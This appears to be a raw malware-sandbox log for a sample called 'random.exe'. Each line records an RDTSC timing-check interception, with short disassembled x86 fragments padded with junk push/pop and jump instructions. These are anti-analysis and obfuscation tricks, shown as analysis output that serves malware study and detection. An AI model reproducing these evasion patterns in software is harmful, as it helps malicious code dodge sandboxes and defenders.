      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B9254 second address: 10B925F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA8D8E1DCF6h 0x0000000a popad 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B9597 second address: 10B95B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jc 00007FA8D8E164A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B970E second address: 10B9712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10B9712 second address: 10B9721 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10BFE0F second address: 10BFE15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10BFE15 second address: 10BFE57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FA8D8E164A6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 je 00007FA8D8E164AAh 0x0000001b pushad 0x0000001c popad 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 push esi 0x00000024 pop esi 0x00000025 jmp 00007FA8D8E164ACh 0x0000002a pop esi 0x0000002b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10BF1B1 second address: 10BF1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFBh 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FA8D8E1DCFFh 0x00000013 popad 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C2936 second address: 10C295D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA8D8E164B7h 0x0000000f jg 00007FA8D8E164A6h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C295D second address: 10C2961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C2961 second address: 10C296A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C296A second address: 10C2972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6CF3 second address: 10C6CF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6CF7 second address: 10C6D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFCh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA8D8E1DD09h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6D22 second address: 10C6D57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA8D8E164AAh 0x00000008 jmp 00007FA8D8E164B8h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FA8D8E164ADh 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6EAD second address: 10C6EC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFFh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6EC0 second address: 10C6EE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164AEh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FA8D8E164ADh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C72F4 second address: 10C7303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FA8D8E1DCF6h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C7303 second address: 10C7307 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C7307 second address: 10C7313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA8D8E1DCF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C7313 second address: 10C7319 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C7319 second address: 10C731D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C75A8 second address: 10C75CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B9h 0x00000007 pushad 0x00000008 jnp 00007FA8D8E164A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C75CC second address: 10C75D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C75D2 second address: 10C75DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C78E3 second address: 10C7909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b js 00007FA8D8E1DCF6h 0x00000011 jnl 00007FA8D8E1DCF6h 0x00000017 pop ebx 0x00000018 jo 00007FA8D8E1DCFEh 0x0000001e jc 00007FA8D8E1DCF6h 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 104B148 second address: 104B14C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C80FE second address: 10C811C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6A4E second address: 10C6A5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 ja 00007FA8D8E164A6h 0x0000000c pop ecx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10C6A5B second address: 10C6A63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CCD46 second address: 10CCD9D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA8D8E164C5h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FA8D8E164B8h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jno 00007FA8D8E164ACh 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CCD9D second address: 10CCDA2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10952B7 second address: 10952BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10952BB second address: 10761CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jmp 00007FA8D8E1DD03h 0x0000000d nop 0x0000000e mov edx, dword ptr [ebp+122D1A55h] 0x00000014 call dword ptr [ebp+1245D33Dh] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d pushad 0x0000001e popad 0x0000001f pop eax 0x00000020 push edx 0x00000021 jns 00007FA8D8E1DCF6h 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 pop edx 0x0000002a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10954A4 second address: 10954B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164ABh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10954B3 second address: 10954B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095882 second address: 1095886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095886 second address: 109588C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109588C second address: 10958FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7F37F23Ah 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007FA8D8E164A8h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b mov dword ptr [ebp+122D19F3h], ebx 0x00000031 call 00007FA8D8E164A9h 0x00000036 push esi 0x00000037 jmp 00007FA8D8E164B3h 0x0000003c pop esi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FA8D8E164B9h 0x00000045 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10958FF second address: 1095918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DD05h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095918 second address: 109591C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109591C second address: 1095969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push edi 0x0000000e push edx 0x0000000f pop edx 0x00000010 pop edi 0x00000011 jmp 00007FA8D8E1DD00h 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 jmp 00007FA8D8E1DD08h 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FA8D8E1DCFBh 0x00000029 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095A34 second address: 1095A3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095AD6 second address: 1095ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1095D94 second address: 1095D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10961E2 second address: 10961EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FA8D8E1DCF6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10961EC second address: 1096240 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D1BD2h] 0x00000015 push 0000001Eh 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FA8D8E164A8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 jmp 00007FA8D8E164B3h 0x00000036 push eax 0x00000037 jo 00007FA8D8E164B0h 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1096359 second address: 109635D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109660B second address: 109660F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109660F second address: 109661A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FA8D8E1DCF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 109661A second address: 1096670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FA8D8E164A8h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 lea eax, dword ptr [ebp+12482FD5h] 0x00000028 call 00007FA8D8E164B9h 0x0000002d js 00007FA8D8E164ACh 0x00000033 sub edx, dword ptr [ebp+122D2906h] 0x00000039 pop edx 0x0000003a nop 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1096670 second address: 1096694 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA8D8E1DD03h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1096694 second address: 1076E84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FA8D8E164ACh 0x0000000c popad 0x0000000d nop 0x0000000e jno 00007FA8D8E164ACh 0x00000014 jo 00007FA8D8E164A6h 0x0000001a call dword ptr [ebp+1244D64Dh] 0x00000020 pushad 0x00000021 push ecx 0x00000022 pushad 0x00000023 popad 0x00000024 pop ecx 0x00000025 pushad 0x00000026 jnl 00007FA8D8E164A6h 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e jmp 00007FA8D8E164B7h 0x00000033 popad 0x00000034 pushad 0x00000035 jng 00007FA8D8E164A6h 0x0000003b pushad 0x0000003c popad 0x0000003d jmp 00007FA8D8E164ACh 0x00000042 popad 0x00000043 push eax 0x00000044 push edx 0x00000045 js 00007FA8D8E164A6h 0x0000004b jmp 00007FA8D8E164AFh 0x00000050 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC067 second address: 10CC076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFBh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC076 second address: 10CC089 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA8D8E164A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC488 second address: 10CC499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DCFDh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC499 second address: 10CC49D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC925 second address: 10CC943 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA8D8E1DCF6h 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007FA8D8E1DCF6h 0x00000012 jp 00007FA8D8E1DCF6h 0x00000018 popad 0x00000019 pushad 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10CC943 second address: 10CC949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D3FCE second address: 10D4004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD00h 0x00000007 jmp 00007FA8D8E1DD06h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D4004 second address: 10D401B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164AAh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jg 00007FA8D8E164A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D39C2 second address: 10D39E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007FA8D8E1DCF6h 0x00000010 jmp 00007FA8D8E1DD05h 0x00000015 popad 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D39E8 second address: 10D39EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D39EE second address: 10D39F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D39F2 second address: 10D39F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D3B77 second address: 10D3B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E1DCFFh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10D3CE8 second address: 10D3CFD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164AFh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DA9E0 second address: 10DA9EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FA8D8E1DCF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAB2A second address: 10DAB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAC70 second address: 10DAC74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAC74 second address: 10DAC84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FA8D8E164A6h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAC84 second address: 10DAC88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAE34 second address: 10DAE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jno 00007FA8D8E164A6h 0x0000000b pop edi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jno 00007FA8D8E164A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10DAE4C second address: 10DAE70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DD01h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jns 00007FA8D8E1DCFCh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E07D8 second address: 10E07F2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA8D8E164A6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 jmp 00007FA8D8E164AAh 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E07F2 second address: 10E07F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E09A3 second address: 10E09D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E164AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E09D0 second address: 10E09D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E09D4 second address: 10E09D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0CA0 second address: 10E0CA6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0CA6 second address: 10E0CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0CB2 second address: 10E0CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DD09h 0x00000009 pop ecx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F4A second address: 10E0F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FA8D8E164A6h 0x00000010 pop ecx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F5B second address: 10E0F6F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop ebx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FA8D8E1DD28h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F6F second address: 10E0F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F73 second address: 10E0F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E0F7D second address: 10E0F81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E196E second address: 10E1973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
